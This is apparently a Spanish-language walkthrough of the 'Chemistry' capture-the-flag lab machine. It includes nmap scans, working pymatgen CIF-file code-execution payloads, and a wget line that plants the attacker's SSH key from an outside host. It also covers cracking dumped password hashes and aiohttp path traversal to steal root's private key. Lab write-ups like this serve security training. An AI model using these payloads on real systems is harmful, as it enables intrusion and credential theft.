Chemistry

OS: Linux
Dificultad: Fácil
Puntos: 20

Nmap

nmap -v -p- --min-rate=5000 10.129.28.212
nmap -vvv -p 22,5000 -sV -sC -oN nmap.txt 10.129.28.212
Nmap scan report for 10.129.28.212
Host is up, received echo-reply ttl 63 (0.13s latency).
Scanned at 2024-10-20 07:17:17 EDT for 103s

PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCj5eCYeJYXEGT5pQjRRX4cRr4gHoLUb/riyLfCAQMf40a6IO3BMzwyr3OnfkqZDlr6o9tS69YKDE9ZkWk01vsDM/T1k/m1ooeOaTRhx2Yene9paJnck8Stw4yVWtcq6PPYJA3HxkKeKyAnIVuYBvaPNsm+K5+rsafUEc5FtyEGlEG0YRmyk/NepEFU6qz25S3oqLLgh9Ngz4oGeLudpXOhD4gN6aHnXXUHOXJgXdtY9EgNBfd8paWTnjtloAYi4+ccdMfxO7PcDOxt5SQan1siIkFq/uONyV+nldyS3lLOVUCHD7bXuPemHVWqD2/1pJWf+PRAasCXgcUV+Je4fyNnJwec1yRCbY3qtlBbNjHDJ4p5XmnIkoUm7hWXAquebykLUwj7vaJ/V6L19J4NN8HcBsgcrRlPvRjXz0A2VagJYZV+FVhgdURiIM4ZA7DMzv9RgJCU2tNC4EyvCTAe0rAM2wj0vwYPPEiHL+xXHGSvsoZrjYt1tGHDQvy8fto5RQU=
|   256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLzrl552bgToHASFlKHFsDGrkffR/uYDMLjHOoueMB9HeLRFRvZV5ghoTM3Td9LImvcLsqD84b5n90qy3peebL0=
|   256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIELLgwg7A8Kh8AxmiUXeMe9h/wUnfdoruCJbWci81SSB
5000/tcp open  upnp?   syn-ack ttl 63
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.9.5
|     Date: Sun, 20 Oct 2024 11:17:32 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 719
|     Vary: Cookie

Enumeracion

En el puerto 5000 una vez que nos registramos podemos subir archivos .cif, investigando es posible obtener RCE segun lo que menciona el siguiente issue.

https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f

payload.cif
data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("ping -c 1 10.10.14.75");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Subimos el archivo.

Cuando le demos clic en el boton View se ejecutara nuestro payload.

Obtenemos acceso SSH de la siguiente forma. Creamos la carpeta .ssh.

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("mkdir /home/app/.ssh");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Posteriormente descargamos nuestra public key en el directorio.

data_5yOhtAoR
_audit_creation_date            2018-06-08
_audit_creation_method          "Pymatgen CIF Parser Arbitrary Code Execution Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("wget 10.10.14.75/id_ed25519.pub -O /home/app/.ssh/authorized_keys");0,0,0'


_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "

Nos conectamos por SSH.

┌──(root㉿kali)-[~/htb/Box/Chemistry]
└─# ssh app@10.129.28.212
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)

app@chemistry:~$ id
uid=1001(app) gid=1001(app) groups=1001(app)

Lateral movement

En el siguiente archivo encontramos varios hashes.

app@chemistry:~/instance$ strings database.db 
SQLite format 3
ytableuseruser
CREATE TABLE user (
        id INTEGER NOT NULL,
        username VARCHAR(150) NOT NULL,
        password VARCHAR(150) NOT NULL,
        PRIMARY KEY (id),
        UNIQUE (username)
indexsqlite_autoindex_user_1user
5tablestructurestructure
CREATE TABLE structure (
        id INTEGER NOT NULL,
        user_id INTEGER NOT NULL,
        filename VARCHAR(150) NOT NULL,
        identifier VARCHAR(100) NOT NULL,
        PRIMARY KEY (id),
        FOREIGN KEY(user_id) REFERENCES user (id),
        UNIQUE (identifier)
indexsqlite_autoindex_structure_1structure
Mtest098f6bcd4621d373cade4e832627b4f6+
Mkristel6896ba7b11a62cacffbdaded457c6d92(
Maxel9347f9724ca083b17e39555c36fd9007*
Mfabian4e5d71f53fdd2eabdbabb233113b5dc0+
Mgelacia4af70c80b68267012ecdac9a7e916d18+
Meusebio6cad48078d0241cca9a7b322ecd073b3)
Mtaniaa4aa55e816205dc0389591c9f82f43bb,
Mvictoriac3601ad2286a4293868ec2a4bc606ba3)
Mpeter6845c17d298d95aa942127bdad2ceb9b*
Mcarlos9ad48828b0955513f7cf0f7f6510c8f8*
Mjobert3dec299e06f7ed187bac06bd3b670ab2*
Mrobert02fcf7cfc10adc37959fb21f06c6b467(
Mrosa63ed86ee9f624c7b14f1d4f43dc251a5'
Mapp197865e46b878d9e74a0346b6d59886a)
Madmin2861debaf8d99436a10ed6f75a252abf

Usando crackstation podemos obtener el password del usuario rosa.

Utilizamos las credenciales.

rosa : unicorniosrosados
app@chemistry:~/instance$ su rosa
Password: 
rosa@chemistry:/home/app/instance$ cd
rosa@chemistry:~$ ls
user.txt
rosa@chemistry:~$ cat user.txt 
d7e30bdf30fee816a5e2f08914ad457f
rosa@chemistry:~$

Privilege Escalation

El puerto 8080 esta localmente abierto.

rosa@chemistry:~$ netstat -putona
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)

Hacemos portforward.

ssh rosa@10.129.28.212 -L 8081:127.0.0.1:8080

Identificamos que la aplicacion web esta utilizando la libreria aiohttp/3.9.1 la cual es vulnerable a Path Traversal.

https://ethicalhacking.uk/cve-2024-23334-aiohttps-directory-traversal-vulnerability/#gsc.tab=0

Comprobamos la vulnerabilidad.

Conseguimos la llave RSA del usuario root.

Nos conectamos por SSH.

┌──(root㉿kali)-[~/htb/Box/Chemistry]
└─# ssh -i root-rsa root@10.129.28.212
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-196-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Sun 20 Oct 2024 01:26:24 PM UTC

  System load:           0.0
  Usage of /:            78.4% of 5.08GB
  Memory usage:          23%
  Swap usage:            0%
  Processes:             230
  Users logged in:       1
  IPv4 address for eth0: 10.129.28.212
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6d94


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

9 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Oct 11 14:06:59 2024
root@chemistry:~# id
uid=0(root) gid=0(root) groups=0(root)
root@chemistry:~# ls
root.txt
root@chemistry:~# cat root.txt
a7b1b08990aac5c9afc158f0830d4462
root@chemistry:~#

Referencias

https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
https://ethicalhacking.uk/cve-2024-23334-aiohttps-directory-traversal-vulnerability/#gsc.tab=0